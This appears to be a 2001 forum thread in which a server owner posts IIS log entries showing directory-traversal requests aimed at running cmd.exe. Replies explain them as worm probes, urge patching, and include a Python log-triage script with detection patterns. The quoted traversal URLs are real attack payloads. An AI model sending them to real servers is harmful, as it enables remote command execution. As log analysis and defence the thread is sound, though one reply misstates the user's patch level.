
Strange log entries..

Status
Not open for further replies.

NightWatcher

Programmer
Jul 8, 2001
95
GB
Hi..
I have attached part of my IIS log file, which is a bit strange..
Can anyone help me to understand what happened?

----------------------------------------
2001-07-22 09:02:20 202.207.144.6 - 000.000.000.000 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 502 -
2001-07-22 09:02:20 202.207.144.6 - 000.000.000.000 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir 502 -
2001-07-22 09:02:22 202.207.144.6 - 000.000.000.000 80 GET /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir 500 -
2001-07-22 09:02:22 202.207.144.6 - 000.000.000.000 80 GET /scripts/..À%9v../winnt/system32/cmd.exe /c+dir 500 -
2001-07-22 09:02:25 202.207.144.6 - 000.000.000.000 80 GET /scripts/..À%qf../winnt/system32/cmd.exe /c+dir 500 -
2001-07-22 09:02:29 202.207.144.6 - 000.000.000.000 80 GET /scripts/..Á%8s../winnt/system32/cmd.exe /c+dir 500 -
2001-07-22 09:02:29 202.207.144.6 - 000.000.000.000 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2001-07-22 09:02:31 202.207.144.6 - 000.000.000.000 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir 502 -
2001-07-22 09:02:35 202.207.144.6 - 000.000.000.000 80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
2001-07-22 09:02:40 202.207.144.6 - 000.000.000.000 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 502 -
2001-07-22 09:02:44 202.207.144.6 - 000.000.000.000 80 GET /scripts/..ð€€¯../winnt/system32/cmd.exe /c+dir 404 -
2001-07-22 09:02:49 202.207.144.6 - 000.000.000.000 80 GET /scripts/..ø€€€¯../winnt/system32/cmd.exe /c+dir 404 -
2001-07-22 09:02:50 202.207.144.6 - 000.000.000.000 80 GET /scripts/..ü€€€€¯../winnt/system32/cmd.exe /c+dir 404 -
2001-07-22 09:02:55 202.207.144.6 - 000.000.000.000 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 403 -
----------------------------------------

The 000.000.000.000 is where my IP was.
What was it that they were trying to do?
And did they succeed?

Thank you.


NightWatcher
 
Someone is trying to get CMD.EXE to execute a command on your web site. Those 404 and 5xx result codes indicate that the CMD.EXE program was not found and/or they were denied access to the directory they tried to access. There are also "malformed" URLs in there hoping to exploit some vulnerability in "unpatched" systems. I've seen the same thing on my web site, but my site is hosted so I have no directory structure that contains WINNT. I don't know much more than that. If they had succeeded, you would know. Get the latest patches from MS if this is your server.
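As an added example (not code from the thread or from any of its posters), here is a small Python script that triages IIS W3C extended log records like the ones quoted above: it parses each line, flags the cmd.exe traversal probes, and ranks each hit by status code. The log lines, client and server IPs are constructed to resemble the excerpt, and the single 200 line is made up to show what a request that actually ran would look like.

```python
from urllib.parse import unquote

# Constructed sample lines modelled on the thread's excerpt (documentation IPs,
# not the real addresses); the 200 line is added to show what success looks like.
SAMPLE_LOG = "\n".join([
    "#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)",
    "2001-07-22 09:02:20 203.0.113.9 - 192.0.2.10 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 502 -",
    "2001-07-22 09:02:20 203.0.113.9 - 192.0.2.10 80 GET /scripts/..\\../winnt/system32/cmd.exe /c+dir 502 -",
    "2001-07-22 09:02:35 203.0.113.9 - 192.0.2.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -",
    "2001-07-22 09:02:55 203.0.113.9 - 192.0.2.10 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 403 -",
    "2001-07-22 09:03:01 203.0.113.9 - 192.0.2.10 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -",
    "2001-07-22 09:03:10 198.51.100.4 - 192.0.2.10 80 GET /default.htm - 200 -",
])
# Column order of the W3C extended format in the thread's excerpt.
FIELDS = ["date", "time", "c_ip", "cs_username", "s_ip", "s_port", "cs_method",
          "cs_uri_stem", "cs_uri_query", "sc_status", "cs_user_agent"]

def parse_line(line):
    """One log record as a dict, or None for '#' directives and odd lines."""
    parts = line.split()
    if line.startswith("#") or len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))

def normalise(stem):
    # Decode twice (the bugs hinged on decoding after the path check) and
    # fold backslashes, so '..\..' and '..%5c..' both read as '../..'.
    return unquote(unquote(stem)).replace("\\", "/").lower()

def is_traversal_probe(rec):
    stem = normalise(rec["cs_uri_stem"])
    return "/../" in stem or "cmd.exe" in stem

def verdict(status):
    # A 5xx is not proof of failure: IIS answered 502 when a CGI executable
    # ran but emitted output without HTTP headers, so 5xx goes to review.
    code = int(status)
    if code == 200:
        return "LIKELY_EXECUTED"
    return "BLOCKED" if code in (403, 404) else "REVIEW"

def triage(log_text):
    """(client ip, stem, status, verdict) for every probe line in the log."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_traversal_probe(rec):
            hits.append((rec["c_ip"], rec["cs_uri_stem"], rec["sc_status"],
                         verdict(rec["sc_status"])))
    return hits
```

Run `triage(SAMPLE_LOG)` against your own log file's contents; anything marked LIKELY_EXECUTED or REVIEW from one source in a short burst is worth checking on the host itself rather than trusting the status code alone.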
 
Thanks..
Let me tell you something, my system is as unpatched as when it was first installed, a week ago. I chose this policy, coz in my last installation I applied SP1, SP2, and all the patches, I even downloaded the Patch Warning utility, to apply patches as they become available, and that, or something else, screwed the whole system up, ASPs stopped working, IIS wouldn't restart, and a whole lot more, so this time I have not patched it at all, and it works fine.. Now, either the hackers didn't know what they were doing, or I was lucky, but still, I'm a bit reluctant in starting patching up again, and ending up with an unusable system.

Comments, suggestions or criticism on this will be very much appreciated.

Thank you.


NightWatcher
 
You might want to run your virus checker or worm scanner (thecleaner.com). It looks familiar, but I've been seeing so many different postings for viruses my head is spinning.
 
I can tell you that what you are seeing is the result of the Code Blue worm trying to access your system. Since your system has SP2 on it, it will be safe from the Nimda worm. SP2 included a hotfix called MS00-78 which was to prevent the web traversal vulnerability, which Code Blue affects. It is in your best interest to apply MS01-044 on a system that is running IIS 5.0. The MS01-044 is a Service Pack Roll-Up for IIS and protects you from all vulnerabilities in IIS. For more details on the Code Blue attempted infection of your system go to:
 